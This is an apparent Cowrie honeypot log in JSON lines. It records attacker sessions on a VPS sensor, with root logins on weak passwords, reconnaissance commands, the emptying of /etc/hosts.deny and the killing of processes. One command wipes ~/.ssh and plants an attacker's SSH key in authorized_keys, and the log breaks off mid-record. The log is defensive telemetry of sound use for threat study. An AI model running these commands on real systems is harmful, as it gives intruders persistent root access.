{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6839939b102dfbbc47f5d5133ed3a7528b4b4292d0d51385ea6ad970d8d67e25","size":21,"shasum":"6839939b102dfbbc47f5d5133ed3a7528b4b4292d0d51385ea6ad970d8d67e25","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/6839939b102dfbbc47f5d5133ed3a7528b4b4292d0d51385ea6ad970d8d67e25 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:28.115334Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:28.659656Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T04:52:28.660436Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T04:52:28.912603Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:28.913566Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:29.958425Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T04:52:29.959458Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:30.209122Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:30.722209Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T04:52:30.722864Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":26,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:30.972545Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:31.562327Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T04:52:31.563116Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T04:52:31.563945Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:31.814688Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:32.328923Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T04:52:32.329618Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:32.577757Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39011,"dst_ip":"1.2.3.4","dst_port":23,"session":"b5be4a6a988e","protocol":"telnet","message":"New connection: 212.227.235.229:39011 (1.2.3.4:23) [session: b5be4a6a988e]","sensor":"my-vps","timestamp":"2025-08-26T04:52:32.988305Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:33.165087Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T04:52:33.165756Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:33.414752Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:33.964582Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T04:52:33.965294Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34042,"dst_ip":"1.2.3.4","dst_port":22,"session":"72fe8cb7e441","protocol":"ssh","message":"New connection: 212.227.235.229:34042 (1.2.3.4:22) [session: 72fe8cb7e441]","sensor":"my-vps","timestamp":"2025-08-26T04:52:34.045927Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:34.214544Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:34.729659Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T04:52:34.730345Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:34.980999Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:52:35.259010Z","src_ip":"212.227.235.229","session":"72fe8cb7e441"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:52:35.259823Z","src_ip":"212.227.235.229","session":"72fe8cb7e441"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:35.576840Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T04:52:35.577582Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:35.826101Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:36.880761Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T04:52:36.881797Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:37.130128Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:37.643752Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T04:52:37.644543Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:37.892524Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:38.489799Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T04:52:38.490489Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:38.739463Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.login.success","username":"root","password":"moh@mad","message":"login attempt [root/moh@mad] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:52:39.126325Z","src_ip":"212.227.235.229","session":"72fe8cb7e441"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:39.252955Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T04:52:39.253710Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:39.503047Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:39.910317Z","src_ip":"212.227.235.229","session":"72fe8cb7e441"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:40.093324Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T04:52:40.094007Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45584,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdfcd3ed8ba8","protocol":"telnet","message":"New connection: 212.227.125.160:45584 (1.2.3.4:23) [session: fdfcd3ed8ba8]","sensor":"my-vps","timestamp":"2025-08-26T04:52:40.202517Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:40.203868Z","src_ip":"212.227.125.160","session":"fdfcd3ed8ba8"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:40.204767Z","src_ip":"212.227.125.160","session":"fdfcd3ed8ba8"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-26T04:52:40.206125Z","src_ip":"212.227.125.160","session":"fdfcd3ed8ba8"}
{"eventid":"cowrie.session.closed","duration":0.12135934829711914,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:40.323793Z","src_ip":"212.227.125.160","session":"fdfcd3ed8ba8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:40.343673Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.closed","duration":"27.4","message":"Connection lost after 27.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:41.079367Z","src_ip":"212.227.235.229","session":"19bff3100c75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47382,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5c53ad63baa","protocol":"ssh","message":"New connection: 212.227.235.229:47382 (1.2.3.4:22) [session: c5c53ad63baa]","sensor":"my-vps","timestamp":"2025-08-26T04:52:53.222630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:52:53.223632Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:52:53.346273Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.session.connect","src_ip":"49.216.120.71","src_port":34611,"dst_ip":"1.2.3.4","dst_port":23,"session":"8a3a0d436732","protocol":"telnet","message":"New connection: 49.216.120.71:34611 (1.2.3.4:23) [session: 8a3a0d436732]","sensor":"my-vps","timestamp":"2025-08-26T04:52:53.543097Z"}
{"eventid":"cowrie.login.success","username":"root","password":"qwert123321","message":"login attempt [root/qwert123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:52:53.878654Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:54.187989Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:52:54.188728Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:52:54.190005Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:54.315242Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:52:54.579452Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:52:54.580141Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:52:54.705861Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:52:54.706924Z","src_ip":"212.227.235.229","session":"c5c53ad63baa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47396,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f5b2a81296e","protocol":"ssh","message":"New connection: 212.227.235.229:47396 (1.2.3.4:22) [session: 5f5b2a81296e]","sensor":"my-vps","timestamp":"2025-08-26T04:52:54.834650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:52:54.835305Z","src_ip":"212.227.235.229","session":"5f5b2a81296e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ec